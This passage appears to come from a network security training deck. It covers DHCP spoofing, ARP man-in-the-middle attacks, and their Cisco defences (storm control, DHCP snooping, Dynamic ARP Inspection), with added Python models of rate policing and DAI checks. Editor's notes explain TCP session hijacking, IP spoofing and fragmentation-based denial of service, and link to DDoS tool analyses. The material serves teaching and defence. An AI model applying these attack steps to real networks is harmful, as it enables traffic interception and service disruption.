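An added example (not from the slides) that models the CAR policy above as a token bucket: tokens refill at 128000 bit/s (16000 bytes/s) into a 16000-byte bucket, a packet that fits the bucket conforms (transmit) and one that does not exceeds (drop). Cisco CAR's extended-burst value (24000 here) adds a probabilistic drop zone that this model leaves out, so it corresponds to the policy with extended burst equal to normal burst; the ICMP traffic samples are constructed.

```python
RATE_BPS = 128000      # average rate from the slide, bits per second
NORMAL_BURST = 16000   # normal burst from the slide, bytes (bucket depth)


class TokenBucket:
    def __init__(self, rate_bps, burst_bytes):
        self.rate_bytes = rate_bps / 8.0      # 16000 bytes/s for 128 kbit/s
        self.depth = float(burst_bytes)
        self.tokens = float(burst_bytes)      # the bucket starts full
        self.last = 0.0                       # time of the previous packet, seconds

    def offer(self, t, size):
        """Return 'transmit' or 'drop' for a packet of `size` bytes arriving at time t."""
        # Credit the tokens earned since the last packet, capped at the burst depth.
        self.tokens = min(self.depth, self.tokens + (t - self.last) * self.rate_bytes)
        self.last = t
        if self.tokens >= size:
            self.tokens -= size
            return "transmit"   # conform-action transmit
        return "drop"           # exceed-action drop (no tokens are consumed)


def police(packets, rate_bps=RATE_BPS, burst=NORMAL_BURST):
    """Apply the policy to a list of (time_seconds, size_bytes) pairs; returns verdicts."""
    bucket = TokenBucket(rate_bps, burst)
    return [bucket.offer(t, size) for t, size in packets]


def icmp_flood_sample():
    """Constructed flood: 100 ICMP packets of 1000 bytes, 1 ms apart (8 Mbit/s offered)."""
    return [(i * 0.001, 1000) for i in range(100)]


def icmp_normal_sample():
    """Constructed conforming traffic: 1000-byte pings every 100 ms (80 kbit/s offered)."""
    return [(i * 0.1, 1000) for i in range(20)]
```

With the flood sample the first 16 packets drain the 16000-byte burst, after which only the trickle of refilled tokens (16 bytes per millisecond) lets a packet through, so 17 of the 100 packets are transmitted.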
  • 49. Spoofing the DHCP Server
  1. An attacker activates a DHCP server on a network segment.
  2. The client broadcasts a request for DHCP configuration information.
  3. The rogue DHCP server responds before the legitimate DHCP server can respond, assigning attacker-defined IP configuration information.
  4. Host packets are redirected to the attacker address as it emulates a default gateway for the erroneous DHCP address provided to the client.
  (Figure: client, rogue DHCP attacker, legitimate DHCP server)
  • 50. Everything starts with DHCP starvation…
  • 51. Storm Control can help…
  interface fastethernet 0/1
   storm-control broadcast level 10.00 8.00
  • 52. DHCP Snooping
  – DHCP snooping allows the configuration of ports as trusted or untrusted.
    • Trusted ports can send DHCP requests and acknowledgements.
    • Untrusted ports can forward only DHCP requests.
  – DHCP snooping enables the switch to build a DHCP binding table that maps a client MAC address, IP address, VLAN, and port ID.
  – Use the ip dhcp snooping command.
  (Figure: client, rogue DHCP attacker, legitimate DHCP server)
  • 53. DHCP Snooping Configuration
  ip dhcp snooping
  ip dhcp snooping vlan 20
  interface FastEthernet0/13
   switchport access vlan 20
   ip dhcp snooping trust
  Switch#sh ip dhcp snooping binding
  MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
  ------------------  ---------------  ----------  -------------  ----  --------------------
  00:14:A8:96:2C:40   10.1.2.12        86371       dhcp-snooping  20    FastEthernet0/24
  00:14:6A:1D:B8:00   10.1.2.13        86371       dhcp-snooping  20    FastEthernet0/23
  Total number of bindings: 2
  • 54. ARP Spoofing: Man-in-the-Middle Attacks
  (Figure: host A at IP 10.1.1.2 with MAC A.A.A.A, host B at IP 10.1.1.1 with MAC B.B.B.B, and the attacker, host C, at IP 10.1.1.3 with MAC C.C.C.C)
  1. Host A (IP 10.1.1.2) asks: MAC for 10.1.1.1?
  2. Legitimate ARP reply: 10.1.1.1 = MAC B.B.B.B
  3. Subsequent gratuitous ARP replies overwrite the legitimate replies:
     • 10.1.1.1 bound to C.C.C.C
     • 10.1.1.2 bound to C.C.C.C
  Resulting ARP tables:
  • ARP table in host A: 10.1.1.1 = MAC C.C.C.C
  • ARP table in host B: 10.1.1.2 = MAC C.C.C.C
  • ARP table in host C: 10.1.1.1 = MAC B.B.B.B, 10.1.1.2 = MAC A.A.A.A
  • 55. Mitigating Man-in-the-Middle Attacks with DAI
  • MAC or IP tracking built on DHCP snooping
  • DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof.
  • DAI function:
    – Track DHCP Discovery
    – Track DHCP Offer (MAC or IP)
    – Track subsequent ARPs for MAC or IP
  (Figure: a client at 10.1.1.2, a DHCP server, and a host at 10.1.1.1; the DHCP Discovery is broadcast and the DHCP Offer is unicast)
  • 56. DAI in Action
  • A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping.
  (Figure: the gateway is 10.1.1.1; a GARP claiming "I am your gateway: 10.1.1.1" is sent to attempt to change the IP-address-to-MAC bindings, but according to the binding table the attacker is not the gateway)
  • 57. DAI Configuration…
  ip arp inspection vlan 20
  ip arp inspection vlan 20 logging dhcp-bindings all
  ip arp inspection validate src-mac
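An added example (not from the slides) that parses the show ip dhcp snooping binding output from slide 53 and applies the DAI checks enabled above: an ARP frame on an untrusted port must match a snooping binding on sender IP, sender MAC and VLAN, and validate src-mac additionally requires the Ethernet source MAC to equal the ARP sender MAC. ArpFrame, dai_check and the sample ARP frames are constructed for this example.

```python
import re
from collections import namedtuple

# Binding table as printed on slide 53 (whitespace normalised).
SNOOPING_OUTPUT = """\
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:14:A8:96:2C:40   10.1.2.12        86371       dhcp-snooping  20    FastEthernet0/24
00:14:6A:1D:B8:00   10.1.2.13        86371       dhcp-snooping  20    FastEthernet0/23
Total number of bindings: 2
"""

Binding = namedtuple("Binding", "mac ip vlan port")
# One data row: MAC, IP, lease, type, VLAN, interface (header and ruler lines do not match).
ROW = re.compile(r"^([0-9A-F:]{17})\s+(\d+(?:\.\d+){3})\s+\d+\s+\S+\s+(\d+)\s+(\S+)$", re.I)


def parse_bindings(text):
    """Return {(ip, vlan): Binding} built from 'show ip dhcp snooping binding' output."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            mac, ip, vlan, port = m.groups()
            table[(ip, int(vlan))] = Binding(mac.upper(), ip, int(vlan), port)
    return table


# Constructed view of an ARP reply: Ethernet source MAC, ARP sender MAC and IP,
# and the VLAN and switch port the frame arrived on.
ArpFrame = namedtuple("ArpFrame", "eth_src sender_mac sender_ip vlan port")


def dai_check(frame, bindings, trusted_ports=(), validate_src_mac=True):
    """Return (verdict, reason) as DAI would decide for one ARP frame."""
    if frame.port in trusted_ports:
        return ("permit", "trusted-port")       # DAI does not inspect trusted ports
    if validate_src_mac and frame.eth_src.upper() != frame.sender_mac.upper():
        return ("drop", "src-mac-mismatch")     # 'ip arp inspection validate src-mac'
    binding = bindings.get((frame.sender_ip, frame.vlan))
    if binding is None or binding.mac != frame.sender_mac.upper():
        return ("drop", "no-matching-binding")  # sender IP/MAC not in the snooping table
    return ("permit", "binding-ok")
```

A gratuitous ARP in which the host on FastEthernet0/23 claims 10.1.2.12 fails the binding check, because the snooping table ties that address to 00:14:A8:96:2C:40.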
  • 58. Questions & Discussion

Editor's Notes

  1. Mstream - http://staff.washington.edu/dittrich/misc/mstream.analysis.txt Stacheldraht - http://staff.washington.edu/dittrich/misc/stacheldraht.analysis.txt Trin00 - http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt TFN - http://staff.washington.edu/dittrich/misc/tfn.analysis.txt
  2. AntiSniff - http://www.securitysoftwaretech.com/antisniff/ Check Promiscuous Mode (CPM) – ftp://ftp.cert.org/pub/tools/cpm IFSTATUS - ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysutils/ifstatus/ LiSt Open Files (lsof) - ftp://vic.cc.purdue.edu/pub/tools/unix/lsof Neped - http://www.attrition.org/security/newbie/security/sniffer/neped.c Promisc - http://www.attrition.org/security/newbie/security/sniffer/promisc.c SNORT - http://www.snort.org
  6. Windows Domain Models - http://is-it-true.org/nt/atips/atips307.shtml Linux/UNIX Trusts - http://nim.cit.cornell.edu/usr/share/man/info/en_US/a_doc_lib/files/aixfiles/hosts.equiv.htm
  7. Allows traffic entering a compromised machine on a particular port (that is, TCP/22-SSH) to be redirected to a different machine on a different port (TCP/23-Telnet). Allows an attacker to exploit trust relationships to circumvent the firewall for all hosts once he controls one host. A rootkit-based install allows the redirection process, files, and connections to be hidden.
  8. IP Spoofing – an attacker sends a message to a target host with an IP address indicating that the message is coming from a trusted host. The attacker must know the IP address of a trusted host in order to modify the packet headers so that it appears that the packets are coming from that host.
  TCP Session Hijacking – an attacker sniffs for packets being sent from a client to a server in order to identify the two hosts' IP addresses and relative port numbers. Using this information an attacker modifies his packet headers to spoof TCP/IP packets from the client. The attacker then waits to receive an ACK packet from the client communicating with the server (which contains the sequence number of the next packet the client is expecting). The attacker replies to the client using a modified packet with the source address of the server and the destination address of the client. This results in a RST which disconnects the legitimate client. The attacker takes over communications with the server, spoofing the expected sequence number from the ACK that was previously sent from the legitimate client to the server.
  IP Fragmentation – Firewalls that support stateful inspection of established connections analyze packets to see if they are being received in the proper sequence. In the case of IP fragments, the firewall attempts to reassemble all fragments prior to forwarding them on to the final destination. If an attacker sends repeated incomplete or out-of-order fragmented packets to the firewall, it will log and wait for all remaining fragments to be received before handling the connection. As a result, system resources are exhausted due to logging and the firewall is subject to a denial of service. Also, some Intrusion Detection Systems (IDS) do not handle IP fragmentation, out-of-order fragmentation, TCP segment overlap, and out-of-order TCP segments properly, which results in packets slipping through because the IDS failed to alarm.